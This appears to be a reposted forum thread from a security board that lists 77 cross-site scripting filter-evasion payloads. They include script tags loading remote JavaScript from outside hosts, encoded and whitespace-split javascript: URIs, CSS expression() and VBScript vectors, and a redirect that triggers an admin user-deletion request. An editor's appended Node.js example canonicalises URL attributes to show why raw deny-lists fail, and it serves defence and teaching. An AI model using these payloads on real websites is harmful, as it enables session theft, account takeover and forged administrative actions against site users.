12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267

There doesn't seem to be much XSS material on t00ls, so I'm copying over something good I came across, in case anyone wants to bookmark it.

(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using a JavaScript directive
<IMG SRC="javascript:alert('XSS');">
(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>
(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>
(9) 7-digit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>
(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>
(11) Embedded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">
(15) Embedded multi-line JavaScript injection, an extreme XSS example
<IMG SRC="javascript:alert('XSS')">
(16) Getting around a character limit (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
(17) Null byte
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null byte 2; null bytes are basically useless in China, since there's nowhere to exploit them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) IMG tag with spaces and meta characters before the JavaScript
<IMG SRC=" javascript:alert('XSS');">
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and a few other browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escaping the JavaScript escapes
\";alert('XSS');//
(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) INPUT image
<INPUT SRC="javascript:alert('XSS');">
(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag
<BODY('XSS')>
(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">
(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) list-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'>
(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) DIV background-image with extra characters added (1-32, 34, 39, 160, 8192-8, 13, 12288, 65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">
(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">
(50) Anonymous tag with STYLE (just an open angle bracket and a leading letter)
<XSS STYLE="xss:expression(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
(52) IMG STYLE
exppression(alert("XSS"))'>
(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag; you can embed a Flash file that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>
(56) Using ActionScript inside Flash you can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
(57) XML namespace; the .HTC file must be on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JS gets filtered, you can put the JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>
(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding
<A HREF="http://3w.org">XSS</A>
(70) IP as a decimal number
<A HREF="http://3232235521">XSS</A>
(71) IP in hex
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding
<A HREF="h tt p://6 6.000146.0x7.147/">XSS</A>
(74) Dropping the "http:"
<A HREF="//www.google.com/">XSS</A>
(75) Dropping the "www"
<A HREF="http://google.com/">XSS</A>
(76) Absolute DNS name with a trailing dot
<A HREF="http://www.google.com./">XSS</A>
(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

Original source: http://fuzzexp.org/u/0day/?p=14
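Editor's added example, not part of the post above or of the cheat sheet it copies: a small Node.js script that canonicalises a URL-bearing attribute value (SRC, HREF, BACKGROUND, url()) the way a browser reads it, and then applies a scheme allow-list, next to the raw-string deny-list that items 4 to 19 and 70 to 76 are written to get past. Numeric character references (with and without semicolons, zero-padded), embedded tab/newline/CR/NUL, leading whitespace, case, dword/hex/octal/mixed IPv4 hosts and trailing dots are all normalised. Function names, the "same-as-page" label for "//host" URLs and the sample inputs are assumptions of this example; named entities, userinfo, ports and IPv6 literals are deliberately left out.

```javascript
// Editor's added example (not from the post or the cheat sheet it copies):
// canonicalise a URL-bearing attribute value (SRC, HREF, BACKGROUND, url())
// the way the browser reads it, and only then decide whether to allow it.
// The "JaVaScRiPt:", "&#106;&#97;...", "jav<TAB>ascript:", "java\0script:",
// " javascript:" and "http://3232235521" items all work because the filter
// looks at the raw string while the browser looks at the decoded one.
// Function names and the sample inputs at the bottom are this example's own.

// Step 1: numeric character references.  In attribute values HTML decodes
// &#106; and &#x6A;, and also the semicolon-less and zero-padded forms the
// sheet lists (&#0000106, &#x6A), consuming as many digits as it can.
// Named references (&colon;, &Tab;) need a full entity table; not done here.
function decodeNumericRefs(s) {
  return s.replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, (whole, body) => {
    const cp = /^x/i.test(body) ? parseInt(body.slice(1), 16) : parseInt(body, 10);
    return cp > 0x10ffff ? whole : String.fromCodePoint(cp);
  });
}

// Step 2: whitespace the URL parser throws away.  Tab, LF and CR vanish
// anywhere in a URL (the "jav<TAB>ascript:" items); C0 controls and spaces
// are trimmed from both ends (the " javascript:" item).  NUL is dropped too,
// because older engines read "java\0script:" as "javascript:" (item 17).
function stripUrlNoise(s) {
  return s.replace(/[\t\n\r\0]/g, "")
          .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, "");
}

// Step 3: IPv4 written as one decimal dword, hex, octal or a mix (items
// 70-73), following the URL Standard's IPv4 parser: "0x" means hex, a
// leading 0 means octal, and the last part fills the remaining bytes.
function parseIPv4Part(part) {
  let radix = 10, digits = part;
  if (/^0x/i.test(part)) { radix = 16; digits = part.slice(2); }
  else if (part.length > 1 && part[0] === "0") { radix = 8; digits = part.slice(1); }
  const ok = { 10: /^[0-9]+$/, 16: /^[0-9a-f]*$/i, 8: /^[0-7]+$/ }[radix];
  if (!ok.test(digits)) return null;
  return digits === "" ? 0 : parseInt(digits, radix);
}

function canonicalIPv4(host) {
  const nums = host.split(".").map(parseIPv4Part);
  if (nums.length > 4 || nums.some((n) => n === null)) return null; // a DNS name
  const last = nums[nums.length - 1];
  if (last >= 256 ** (5 - nums.length)) return null;                 // overflow
  if (nums.slice(0, -1).some((n) => n > 255)) return null;
  let value = last;
  nums.slice(0, -1).forEach((n, i) => { value += n * 256 ** (3 - i); });
  return [24, 16, 8, 0].map((sh) => Math.floor(value / 2 ** sh) % 256).join(".");
}

// Step 4: the canonical view.  The host is lower-cased and loses a trailing
// dot (item 76); "//host" (item 74) takes the page's own scheme.  Userinfo,
// ports and IPv6 literals are left out to keep the example short.
function canonicalizeUrlAttribute(raw) {
  const url = stripUrlNoise(decodeNumericRefs(raw));
  const s = /^([a-z][a-z0-9+.-]*):/i.exec(url);
  const scheme = s ? s[1].toLowerCase() : (url.startsWith("//") ? "same-as-page" : null);
  let host = null;
  const h = /^(?:[a-z][a-z0-9+.-]*:)?\/\/([^/?#\\]*)/i.exec(url);
  if (h && ["http", "https", "same-as-page"].includes(scheme)) {
    host = h[1].toLowerCase().replace(/\.$/, "");
    host = canonicalIPv4(host) || host;
  }
  return { scheme, host, url };
}

// The raw-string deny-list these payloads are written against ...
function rawDenyList(raw) {
  return !/javascript:|vbscript:/i.test(raw);
}
// ... and the check to make instead: an allow-list of schemes, applied to
// the canonical form.  A value with no scheme at all is a relative URL.
function schemeAllowList(raw) {
  const { scheme } = canonicalizeUrlAttribute(raw);
  return scheme === null || ["same-as-page", "http", "https"].includes(scheme);
}

// Constructed sample attribute values: items 4, 5, 10, 11, 17, 19 and 40 of
// the sheet, with the embedded tab and NUL written as JS escapes.
const SAMPLES = [
  "JaVaScRiPt:alert('XSS')",
  "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')",
  "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A;alert('XSS')",
  "jav\tascript:alert('XSS');",
  "java\0script:alert('XSS')",
  " \t javascript:alert('XSS');",
  "vbscript:msgbox(\"XSS\")",
];

// How many of the samples a given filter lets through.
function letThrough(filter) {
  return SAMPLES.filter(filter).length;
}

console.log("raw deny-list lets through:", letThrough(rawDenyList));            // 4
console.log("canonical allow-list lets through:", letThrough(schemeAllowList)); // 0
console.log(canonicalizeUrlAttribute("http://0xc0.0xa8.0x00.0x01").host);       // 192.168.0.1
```

Run it with node: the deny-list passes four of the seven payloads, the canonical allow-list passes none, and the decimal, hex, octal and mixed spellings of the host all come back as 192.168.0.1. The point of the whole list above is that every entry is a different spelling of the same decoded string, so a filter decision on a URL attribute has to be made on the decoded form, as an allow-list, not by searching the raw text for "javascript:".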